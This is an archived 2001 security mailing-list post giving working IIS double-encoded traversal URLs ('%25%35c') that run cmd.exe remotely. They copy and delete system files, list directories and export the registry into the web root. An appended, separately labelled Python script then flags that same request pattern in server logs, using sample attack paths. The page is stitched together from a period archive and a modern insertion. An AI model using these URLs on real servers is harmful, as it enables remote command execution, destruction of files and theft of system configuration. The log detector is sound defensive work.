RE: IIS : access to cmd.exe and multiple commands on one line

From: Sam Steinmeyer (SamSteinmeyer@winn-dixie.com)
Date: Wed Oct 24 2001 - 10:54:58 PDT


    I've tried various combinations myself.  You can call any valid cmd.exe DOS
    command. Example:
    Copy:
    scripts/..%25%35c../winnt/system32/cmd.exe?/c+copy+c:\winnt\system32\xcopy.exe+c:\Mycopy.exe
    
    Delete:
    scripts/..%25%35c../winnt/system32/cmd.exe?/c+del+c:\winnt\system32\xcopy.exe+c:\Mycopy.exe
    
    Dir with /w:
    scripts/..%25%35c../winnt/system32/cmd.exe?/c+dir+/w
    
    Here's a cool one: Dump the registry to a text file and view from web... :)
    scripts/..%25%35c../winnt/system32/cmd.exe?/c+regedit+/e+c:\inetpub\wwwroot\registry.txt
    
    When executing the cmd.exe through IIS, you only have one shot. However,
    when you are in the DOS Shell, you have the advantage of the Shell to parse
    your command lines.
    I.e.
    >dir /w | cmd
    You will not be able to mimic this through IIS, due to the absence of the
    DOS Shell.
    
    my 2 cents.
             ______
            /_____/\          Harry Steinmeyer
           /____ \\ \         Senior Programmer
          /_____\ \\ /        Winn-Dixie, Inc.
         /_____/ \/ / /       
        /_____/ /   \//\      rm -rf /bin/laden
        \_____\//\   / /
         \_____/ / /\ /       
          \_____/ \\ \        
           \_____\ \\        
            \_____\/          
    "Science without religion is lame, religion without science is blind."
    Einstein, Albert (1879-1955)
    
    ----------------------------------------------------------------------------
    This list is provided by the SecurityFocus Security Intelligence Alert (SIA)
    Service. For more information on SecurityFocus' SIA service which
    automatically alerts you to the latest security vulnerabilities please see:
    https://alerts.securityfocus.com/
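An added example, not part of Sam Steinmeyer's post or of the SecurityFocus list: a small Python normalizer a defender can run over web-server request logs to flag the request pattern quoted above. It percent-decodes a request path repeatedly until the string stops changing, so the `%25%35c` form collapses to a backslash the same way a server that decodes twice would see it, then walks the path segments to check whether the request climbs above the web root and whether the final component is cmd.exe. It generalizes slightly beyond the post by also catching the single-encoded `%5c` form. The sample request paths, the finding names and the `full_decode`/`analyze` function names are constructed for this example, not taken from any product or log format.

```python
from urllib.parse import unquote

# Constructed sample request paths. The first mirrors the double-encoded
# form quoted in the post; the others are made up for illustration.
SAMPLE_PATHS = [
    "/scripts/..%25%35c../winnt/system32/cmd.exe?/c+dir+/w",
    "/scripts/..%5c../winnt/system32/cmd.exe?/c+copy+a+b",
    "/scripts/default.asp",
    "/images/logo.gif",
]

MAX_DECODE_ROUNDS = 3  # assumption: three rounds is enough for real traffic


def full_decode(path, max_rounds=MAX_DECODE_ROUNDS):
    """Percent-decode until the string is stable.

    Returns (decoded, rounds). A round count of 2 or more means the
    client sent a double-encoded path, which a single-decoding filter
    would not have seen as a traversal.
    """
    current = path
    rounds = 0
    while rounds < max_rounds:
        decoded = unquote(current)
        if decoded == current:
            break
        current = decoded
        rounds += 1
    return current, rounds


def analyze(request_path):
    """Return a dict describing why a request path looks suspicious."""
    decoded, rounds = full_decode(request_path)
    # Only the path part matters for traversal; the query holds cmd args.
    path_part = decoded.split("?", 1)[0]
    # Treat backslash and forward slash alike, as the Windows file system does.
    segments = path_part.replace("\\", "/").split("/")

    depth = 0
    escaped = False
    for seg in segments:
        if seg in ("", "."):
            continue
        if seg == "..":
            depth -= 1
            if depth < 0:
                escaped = True  # climbed above the directory the URL started in
        else:
            depth += 1

    basename = segments[-1].lower() if segments else ""

    findings = set()
    if rounds >= 2:
        findings.add("double_encoding")
    if escaped:
        findings.add("traversal_outside_root")
    if basename == "cmd.exe":
        findings.add("shell_invocation")

    return {
        "raw": request_path,
        "decoded": decoded,
        "decode_rounds": rounds,
        "findings": findings,
        "suspicious": bool(findings),
    }


def classify_requests(paths):
    """Map each request path to its analysis; handy over a log extract."""
    return {p: analyze(p) for p in paths}


if __name__ == "__main__":
    for path, result in classify_requests(SAMPLE_PATHS).items():
        flag = "ALERT" if result["suspicious"] else "ok   "
        print(f"{flag} rounds={result['decode_rounds']} "
              f"findings={sorted(result['findings'])} {path}")
```

The design point is that normalization has to happen after decoding has fully converged: a filter that decodes once and then looks for `..\` sees only `..%5c..` and lets the request through, which is exactly the gap the post's `%25%35c` string exploits. Counting decode rounds also gives a cheap, low-noise signal on its own, since legitimate clients almost never double-encode a path.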
    



    This archive was generated by hypermail 2b30 : Wed Oct 24 2001 - 14:31:50 PDT